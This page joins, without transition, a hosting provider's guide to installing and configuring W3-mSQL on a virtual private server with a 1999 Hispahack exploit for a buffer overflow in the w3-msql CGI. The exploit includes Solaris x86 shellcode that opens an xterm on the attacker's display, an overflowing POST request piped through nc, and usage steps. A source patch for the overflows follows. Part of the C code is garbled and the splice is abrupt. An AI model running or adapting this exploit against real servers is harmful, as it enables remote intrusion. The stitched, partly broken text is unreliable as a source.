W3-mSQL provides a programmatic interface to the
mSQL database system from within an HTML document. It enables the development of entire programs within a Web page while offering comprehensive access control and security features.
Installation
To install W3-mSQL on your Virtual Private Server, connect to your server via
Telnet or SSH and do the following, according to your server O/S:
Configuration
W3-mSQL enhanced HTML files must be pre-processed by the ~/www/cgi-bin/w3-msql CGI before the web server sends the results to the requesting client. Normally, this pre-processing requires the ~/www/cgi-bin/w3-msql CGI to appear in the URL of each W3-mSQL file on your site. For example:
http://YOUR-DOMAIN.NAME/cgi-bin/w3-msql/file.msql
The
Apache Web Server can be configured to automatically pre-process W3-mSQL files with the
.msql file extension. To setup W3-mSQL redirection, add the following lines to the
~/www/conf/httpd.conf file (or the
~/www/conf/srm.conf file, if you server was configured before Dec. 8, 1998):
AddHandler htmsql msql
Action htmsql /cgi-bin/w3-msql
After doing this, it is possible to access W3-mSQL files this way:
http://YOUR-DOMAIN.NAME/file.msql
The .msql files are automatically pre-processed by the ~/www/cgi-bin/w3-msql CGI without the ~/www/cgi-bin/w3-msql CGI appearing in the URL path.
Sample Application
A sample W3-mSQL application is also available for installation on the Virtual Private Servers. You can install the simple example by unpacking an archive file.
% cd
% tar xvf /usr/local/contrib/w3-msql-demo.tar
Once the files are in place run the install script.
% cd ~/www/htdocs/bookmarks
% ./setup_bookmark
You can then access the sample application at:
http://YOUR-DOMAIN.NAME/bookmarks/Welcome.html
* !Hispahack Research Team
* http://hispahack.ccc.de
*
* Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11)
*
* Platform: Solaris x86
* Feel free to port it to other arquitectures, if you can...
* If so mail me plz.
*
* By: Zhodiac
*
* Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c
* 2) xhost +
* 3) ./w3-msql-xploit | nc
* 4) Take a cup of cofee, some kind of drug or wathever
* estimulates you at hacking time... while the xterm is comming
* or while you are getting raided.
*
* #include
*
* Madrid, 28/10/99
*
* Spain r0x
*
*/
#include
#include
#include
/******************/
/* Customize this */
/******************/
//#define LEN_VAR 50 /* mSQL 2.0.4 - 2.0.10.1 */
#define LEN_VAR 128 /* mSQL 2.0.11 */
// Solaris x86
#define ADDR 0x8045f8
// Shellcode Solaris x86
char shellcode[]= /* By Zhodiac */
"\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06"
"\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc"
"\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe"
"\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89"
"\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0"
"\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
"/bin/shA-cA/usr/openwin/bin/xtermA-displayA";
#define ADDR_TIMES 12
#define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16
#define NOP 0x90
int main (int argc, char *argv[]) {
char *buf, *ptr;
long addr=ADDR;
int aux;
if (argc<3 0x000000ff="" 0x0000ff00="" 80="" addr="" amp="" argv="" aux="0;aux<ADDR_TIMES;aux++)" buf="" char="" display="" exit="" for="" if="" malloc="" memcpy="" memset="" n="" nc="" perror="" printf="" ptr="" s="" sage:="" shellcode="" strlen="" target="">> 8;
ptr[2] = (addr & 0x00ff0000) >> 16;
ptr[3] = (addr & 0xff000000) >> 24;
ptr+=4;
}
printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n");
printf("Connection: Keep-Alive\n");
printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n");
printf("Host: %s\n",argv[1]);
printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n");
printf("Accept-Encoding: gzip\n");
printf("Accept-Language: en\n");
printf("Accept-Charset: iso-8859-1,*,utf-8\n");
printf("Content-type: multipart/form-data\n");
printf("Content-length: %i\n\n",BUFSIZE);
printf("%s \n\n\n",buf);
free(buf);
}
------- w3-msql-xploit.c ---------
- Fix:
======
Best solution is to wait for a new patched version, meanwhile here you
have a patch that will stop this attack and some other (be aware that
this patch was done after a total revision of the code, maybe there are
some other overflows).
------ w3-msql.patch ---------
410c410
< scanf("%s ", boundary);
---
> scanf("%128s ", boundary);
418c418
< strcat(var, buffer);
---
> strncat(var, buffer,sizeof(buffer));
428c428
< scanf(" Content-Type: %s ", buffer);
---
> scanf(" Content-Type: %15360s ", buffer);
------ w3-msql.patch ---------
piscis:~# patch w3-msql.c w3-msql.patch
piscis:~#
Spain r0x
Greetz :)
Zhodiac
http://lwn.net/1999/1230/a/msql.html
https://www.teamits.com/internet/support/vps/msql/w3msql.html
